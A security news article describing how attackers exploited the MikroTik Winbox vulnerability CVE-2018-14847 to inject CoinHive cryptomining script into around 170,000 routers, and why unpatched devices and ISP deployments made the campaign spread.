Thousands of MikroTik Routers Go Bad Following a CoinHive Infection
The practice of mining cryptocurrency at someone else's expense, or crypto jacking, is a phenomenon that seems unlikely to go out of fashion any time soon and the sheer growth of attacks aimed at injecting crypto mining code into the devices they have targeted proves it. The all-out attack against MikroTik routers which originated on July 31 in Brazil makes no exception, either. First reported by Trustwave security specialist Simon Kenin, the hackers involved exploited the CVE-2018-14847 Winbox flaw to get unauthorized access to the routers, eventually dropping the CoinHive script on 170,000 devices and counting, with the ultimate goal of mining Monero coins.
Why Mikrotik Routers?
The sudden flood of Coinhive hits did not pass through thousands of Mikrotik routers by chance. Since Mikrotik routers are a popular option among not only large organizations but also Internet Service Providers, they must have been an obvious target. After all, when ISPs themselves fall victim to compromised routers, all their subscribers run the risk of infection, as well. That's what happened to a web user who complained on Reddit from a persistent, self-executing CoinHive code present in every website he/she landed on. The post also said that no user action could prevent CoinHive from popping up everywhere, which lead Trustwave's Simon Kenin into thinking of a more severe threat beyond the scope of individual users.
Further research not only did confirm this theory but also revealed that the attacker had even gone the extra mile by configuring Mikrotik's devices to execute the CoinHive script whenever a web user connects to the wireless network operated by an infected Mikrotik router. Additional functionalities embedded in the script included:
- A backdoor allowing for editing the code.
- An "error page" generator frequently bombarding web surfers with custom error pages carrying CoinHive.
Exploiting an Already Patched Vulnerability
To inject CoinHive into a myriad of Mikrotik routers, the actors involved took advantage of the so-called Winbox bug (CVE-2018-14847), a type of vulnerability which, if exploited, could grant admin access to a Mikrotik router. However, the Latvian company patched this vulnerability back in April, which raises concern as to why the CoinHive injection went through nonetheless. A large number of Mikrotik's customers did not update their routers on time. Had they done so, the CoinHive infection could and should have been avoided.
Who Benefits the Most From CoinHive?
CoinHive is a cryptocurrency mining platform intended to serve as a better alternative to online advertising. In exchange for no more intrusive pop-ups, users lend some of their processing power to the platform's developers who keep a portion of the generated cryptocurrency while giving the remainder to the site owner. Provided that the code's settings allow for a reasonable CPU limit, the site's visitor's should experience just a minor slowdown. When utilized by malware actors, however, CoinHive is usually set to draw the maximum CPU power. The results are poor computer performance and higher energy costs, which might as well offset the lack of ads. In such cases, it is the hackers in charge who are the big winners as they get to mine Monero coins while others pay the price.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.